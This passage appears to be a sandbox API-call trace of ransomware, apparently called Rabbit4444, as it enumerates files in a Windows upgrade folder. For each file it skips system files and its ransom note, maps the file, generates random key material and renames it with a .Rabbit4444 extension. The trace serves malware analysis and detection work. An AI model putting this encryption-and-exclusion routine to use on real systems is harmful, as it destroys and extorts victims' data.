dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0046.317] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0046.317] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13762730448) returned 1 [0046.317] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=62541) returned 1 [0046.317] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0046.317] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0046.317] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xf750, lpName=0x0) returned 0x298 [0046.323] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf750) returned 0x70000 [0046.326] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0046.326] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0046.326] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0046.326] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0046.326] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0046.327] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0046.327] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0046.327] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0046.327] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13763770424) returned 1 [0046.327] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0046.327] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0046.327] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.328] CloseHandle (hObject=0x298) returned 1 [0046.328] CloseHandle (hObject=0x278) returned 1 [0046.330] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\default.htm.Rabbit4444") returned 55 [0046.330] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\default.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\default.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\default.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\default.htm.rabbit4444"), dwFlags=0x1) returned 1 [0046.330] InterlockedExchangeAdd (in: Addend=0xff618, Value=62544 | out: Addend=0xff618) returned 4061840 [0046.331] InterlockedExchangeAdd (in: Addend=0xff624, Value=10 | out: Addend=0xff624) returned 2588 [0046.331] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3bd859, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3bd859, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x13e24500, ftLastWriteTime.dwHighDateTime=0x1d2ee61, nFileSizeHigh=0x0, nFileSizeLow=0x1a2c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="default_eos.css", cAlternateFileName="DEFAUL~1.CSS")) returned 1 [0046.331] lstrcmpiW (lpString1="default_eos.css", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.331] lstrcmpiW (lpString1="default_eos.css", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.331] lstrcmpiW (lpString1="default_eos.css", lpString2="Rabbit4444.exe") returned -1 [0046.331] lstrcmpiW (lpString1="default_eos.css", lpString2=".") returned 1 [0046.331] lstrcmpiW (lpString1="default_eos.css", lpString2="..") returned 1 [0046.331] lstrcmpiW (lpString1="default_eos.css", lpString2="windows") returned -1 [0046.331] lstrcmpiW (lpString1="default_eos.css", lpString2="bootmgr") returned 1 [0046.331] lstrcmpiW (lpString1="default_eos.css", lpString2="pagefile.sys") returned -1 [0046.331] lstrcmpiW (lpString1="default_eos.css", lpString2="boot") returned 1 [0046.331] lstrcmpiW (lpString1="default_eos.css", lpString2="ids.txt") returned -1 [0046.331] lstrcmpiW (lpString1="default_eos.css", lpString2="NTUSER.DAT") returned -1 [0046.331] lstrcpyW (in: lpString1=0x130eb7a, lpString2="default_eos.css" | out: lpString1="default_eos.css") returned="default_eos.css" [0046.331] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\default_eos.css", dwFileAttributes=0x0) returned 1 [0046.333] lstrlenW (lpString="default_eos.css") returned 15 [0046.333] lstrlenW (lpString="Rabbit4444") returned 10 [0046.333] lstrcmpiW (lpString1="lt_eos.css", lpString2="Rabbit4444") returned -1 [0046.333] lstrlenW (lpString=".dll") returned 4 [0046.333] lstrcmpiW (lpString1=".css", lpString2=".dll") returned -1 [0046.333] lstrlenW (lpString=".lnk") returned 4 [0046.333] lstrcmpiW (lpString1=".css", lpString2=".lnk") returned -1 [0046.333] lstrlenW (lpString=".ini") returned 4 [0046.333] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1 [0046.333] lstrlenW (lpString=".sys") returned 4 [0046.333] lstrcmpiW (lpString1=".css", lpString2=".sys") returned -1 [0046.333] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\default_eos.css" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_eos.css"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0046.333] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0046.333] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13764390543) returned 1 [0046.333] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=6700) returned 1 [0046.333] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0046.333] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0046.333] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1d30, lpName=0x0) returned 0x298 [0046.334] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1d30) returned 0x70000 [0046.336] CryptAcquireContextW (in: phProv=0x130bbd0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x130bbd0*=0x101ea8) returned 1 [0046.337] CryptGenRandom (in: hProv=0x101ea8, dwLen=0x80, pbBuffer=0x130bbec | out: pbBuffer=0x130bbec) returned 1 [0046.337] CryptReleaseContext (hProv=0x101ea8, dwFlags=0x0) returned 1 [0046.337] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0046.337] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0046.337] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0046.337] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0046.337] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0046.337] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0046.337] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0046.337] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0046.338] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13764829138) returned 1 [0046.338] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0046.338] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0046.338] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.338] CloseHandle (hObject=0x298) returned 1 [0046.338] CloseHandle (hObject=0x278) returned 1 [0046.339] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\default_eos.css.Rabbit4444") returned 59 [0046.339] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\default_eos.css" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_eos.css"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\default_eos.css.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_eos.css.rabbit4444"), dwFlags=0x1) returned 1 [0046.340] InterlockedExchangeAdd (in: Addend=0xff618, Value=6704 | out: Addend=0xff618) returned 4124384 [0046.340] InterlockedExchangeAdd (in: Addend=0xff624, Value=4 | out: Addend=0xff624) returned 2598 [0046.340] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3bff6c, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3bff6c, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xea75e900, ftLastWriteTime.dwHighDateTime=0x1d2ee61, nFileSizeHigh=0x0, nFileSizeLow=0xda3a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="default_eos.htm", cAlternateFileName="DEFAUL~1.HTM")) returned 1 [0046.340] lstrcmpiW (lpString1="default_eos.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.340] lstrcmpiW (lpString1="default_eos.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.340] lstrcmpiW (lpString1="default_eos.htm", lpString2="Rabbit4444.exe") returned -1 [0046.340] lstrcmpiW (lpString1="default_eos.htm", lpString2=".") returned 1 [0046.340] lstrcmpiW (lpString1="default_eos.htm", lpString2="..") returned 1 [0046.340] lstrcmpiW (lpString1="default_eos.htm", lpString2="windows") returned -1 [0046.340] lstrcmpiW (lpString1="default_eos.htm", lpString2="bootmgr") returned 1 [0046.340] lstrcmpiW (lpString1="default_eos.htm", lpString2="pagefile.sys") returned -1 [0046.340] lstrcmpiW (lpString1="default_eos.htm", lpString2="boot") returned 1 [0046.340] lstrcmpiW (lpString1="default_eos.htm", lpString2="ids.txt") returned -1 [0046.340] lstrcmpiW (lpString1="default_eos.htm", lpString2="NTUSER.DAT") returned -1 [0046.340] lstrcpyW (in: lpString1=0x130eb7a, lpString2="default_eos.htm" | out: lpString1="default_eos.htm") returned="default_eos.htm" [0046.340] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\default_eos.htm", dwFileAttributes=0x0) returned 1 [0046.340] lstrlenW (lpString="default_eos.htm") returned 15 [0046.340] lstrlenW (lpString="Rabbit4444") returned 10 [0046.340] lstrcmpiW (lpString1="lt_eos.htm", lpString2="Rabbit4444") returned -1 [0046.340] lstrlenW (lpString=".dll") returned 4 [0046.341] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0046.341] lstrlenW (lpString=".lnk") returned 4 [0046.341] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0046.341] lstrlenW (lpString=".ini") returned 4 [0046.341] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0046.341] lstrlenW (lpString=".sys") returned 4 [0046.341] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0046.341] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\default_eos.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_eos.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0046.341] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0046.341] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13765160123) returned 1 [0046.341] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=55866) returned 1 [0046.341] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0046.341] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0046.341] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdd40, lpName=0x0) returned 0x298 [0046.342] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdd40) returned 0x70000 [0046.345] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0046.345] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0046.345] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0046.345] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0046.345] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0046.345] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0046.346] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0046.346] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0046.346] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13765633475) returned 1 [0046.346] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0046.346] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0046.346] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.346] CloseHandle (hObject=0x298) returned 1 [0046.346] CloseHandle (hObject=0x278) returned 1 [0046.349] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\default_eos.htm.Rabbit4444") returned 59 [0046.349] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\default_eos.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_eos.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\default_eos.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_eos.htm.rabbit4444"), dwFlags=0x1) returned 1 [0046.350] InterlockedExchangeAdd (in: Addend=0xff618, Value=55872 | out: Addend=0xff618) returned 4131088 [0046.350] InterlockedExchangeAdd (in: Addend=0xff624, Value=4 | out: Addend=0xff624) returned 2602 [0046.350] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3c12fc, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3c12fc, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x1468, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="default_oobe.css", cAlternateFileName="DEFAUL~2.CSS")) returned 1 [0046.350] lstrcmpiW (lpString1="default_oobe.css", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.350] lstrcmpiW (lpString1="default_oobe.css", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.350] lstrcmpiW (lpString1="default_oobe.css", lpString2="Rabbit4444.exe") returned -1 [0046.350] lstrcmpiW (lpString1="default_oobe.css", lpString2=".") returned 1 [0046.350] lstrcmpiW (lpString1="default_oobe.css", lpString2="..") returned 1 [0046.350] lstrcmpiW (lpString1="default_oobe.css", lpString2="windows") returned -1 [0046.350] lstrcmpiW (lpString1="default_oobe.css", lpString2="bootmgr") returned 1 [0046.350] lstrcmpiW (lpString1="default_oobe.css", lpString2="pagefile.sys") returned -1 [0046.350] lstrcmpiW (lpString1="default_oobe.css", lpString2="boot") returned 1 [0046.350] lstrcmpiW (lpString1="default_oobe.css", lpString2="ids.txt") returned -1 [0046.350] lstrcmpiW (lpString1="default_oobe.css", lpString2="NTUSER.DAT") returned -1 [0046.350] lstrcpyW (in: lpString1=0x130eb7a, lpString2="default_oobe.css" | out: lpString1="default_oobe.css") returned="default_oobe.css" [0046.350] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\default_oobe.css", dwFileAttributes=0x0) returned 1 [0046.351] lstrlenW (lpString="default_oobe.css") returned 16 [0046.351] lstrlenW (lpString="Rabbit4444") returned 10 [0046.351] lstrcmpiW (lpString1="t_oobe.css", lpString2="Rabbit4444") returned 1 [0046.351] lstrlenW (lpString=".dll") returned 4 [0046.351] lstrcmpiW (lpString1=".css", lpString2=".dll") returned -1 [0046.351] lstrlenW (lpString=".lnk") returned 4 [0046.351] lstrcmpiW (lpString1=".css", lpString2=".lnk") returned -1 [0046.351] lstrlenW (lpString=".ini") returned 4 [0046.351] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1 [0046.351] lstrlenW (lpString=".sys") returned 4 [0046.351] lstrcmpiW (lpString1=".css", lpString2=".sys") returned -1 [0046.351] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\default_oobe.css" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_oobe.css"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0046.351] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0046.351] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13766193694) returned 1 [0046.351] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=5224) returned 1 [0046.351] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0046.351] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0046.351] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1770, lpName=0x0) returned 0x298 [0046.352] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1770) returned 0x70000 [0046.354] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0046.354] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0046.354] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0046.354] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0046.354] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0046.354] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0046.354] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0046.354] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0046.354] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13766515582) returned 1 [0046.354] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0046.355] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0046.355] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.355] CloseHandle (hObject=0x298) returned 1 [0046.355] CloseHandle (hObject=0x278) returned 1 [0046.356] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\default_oobe.css.Rabbit4444") returned 60 [0046.356] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\default_oobe.css" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_oobe.css"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\default_oobe.css.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_oobe.css.rabbit4444"), dwFlags=0x1) returned 1 [0046.357] InterlockedExchangeAdd (in: Addend=0xff618, Value=5232 | out: Addend=0xff618) returned 4186960 [0046.357] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 2606 [0046.357] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3c2685, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3c2685, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x7f589b00, ftLastWriteTime.dwHighDateTime=0x1d2ea8c, nFileSizeHigh=0x0, nFileSizeLow=0x100ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="default_oobe.htm", cAlternateFileName="DEFAUL~2.HTM")) returned 1 [0046.357] lstrcmpiW (lpString1="default_oobe.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.357] lstrcmpiW (lpString1="default_oobe.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.357] lstrcmpiW (lpString1="default_oobe.htm", lpString2="Rabbit4444.exe") returned -1 [0046.357] lstrcmpiW (lpString1="default_oobe.htm", lpString2=".") returned 1 [0046.357] lstrcmpiW (lpString1="default_oobe.htm", lpString2="..") returned 1 [0046.357] lstrcmpiW (lpString1="default_oobe.htm", lpString2="windows") returned -1 [0046.357] lstrcmpiW (lpString1="default_oobe.htm", lpString2="bootmgr") returned 1 [0046.357] lstrcmpiW (lpString1="default_oobe.htm", lpString2="pagefile.sys") returned -1 [0046.357] lstrcmpiW (lpString1="default_oobe.htm", lpString2="boot") returned 1 [0046.357] lstrcmpiW (lpString1="default_oobe.htm", lpString2="ids.txt") returned -1 [0046.358] lstrcmpiW (lpString1="default_oobe.htm", lpString2="NTUSER.DAT") returned -1 [0046.358] lstrcpyW (in: lpString1=0x130eb7a, lpString2="default_oobe.htm" | out: lpString1="default_oobe.htm") returned="default_oobe.htm" [0046.358] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\default_oobe.htm", dwFileAttributes=0x0) returned 1 [0046.358] lstrlenW (lpString="default_oobe.htm") returned 16 [0046.358] lstrlenW (lpString="Rabbit4444") returned 10 [0046.358] lstrcmpiW (lpString1="t_oobe.htm", lpString2="Rabbit4444") returned 1 [0046.358] lstrlenW (lpString=".dll") returned 4 [0046.358] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0046.358] lstrlenW (lpString=".lnk") returned 4 [0046.358] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0046.358] lstrlenW (lpString=".ini") returned 4 [0046.358] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0046.358] lstrlenW (lpString=".sys") returned 4 [0046.358] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0046.358] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\default_oobe.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_oobe.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0046.358] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0046.358] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13766915701) returned 1 [0046.358] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=65710) returned 1 [0046.359] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0046.359] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0046.359] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x103b0, lpName=0x0) returned 0x298 [0046.360] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x103b0) returned 0x70000 [0046.363] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0046.363] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0046.363] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0046.363] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0046.363] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0046.363] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0046.363] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0046.363] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0046.363] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13767426220) returned 1 [0046.364] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0046.364] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0046.364] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.364] CloseHandle (hObject=0x298) returned 1 [0046.364] CloseHandle (hObject=0x278) returned 1 [0046.367] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\default_oobe.htm.Rabbit4444") returned 60 [0046.367] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\default_oobe.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_oobe.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\default_oobe.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_oobe.htm.rabbit4444"), dwFlags=0x1) returned 1 [0046.367] InterlockedExchangeAdd (in: Addend=0xff618, Value=65712 | out: Addend=0xff618) returned 4192192 [0046.367] InterlockedExchangeAdd (in: Addend=0xff624, Value=5 | out: Addend=0xff624) returned 2609 [0046.367] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea3c4d9e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5f6eb5, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xea5f6eb5, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA", cAlternateFileName="")) returned 1 [0046.367] lstrcmpiW (lpString1="EULA", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.367] 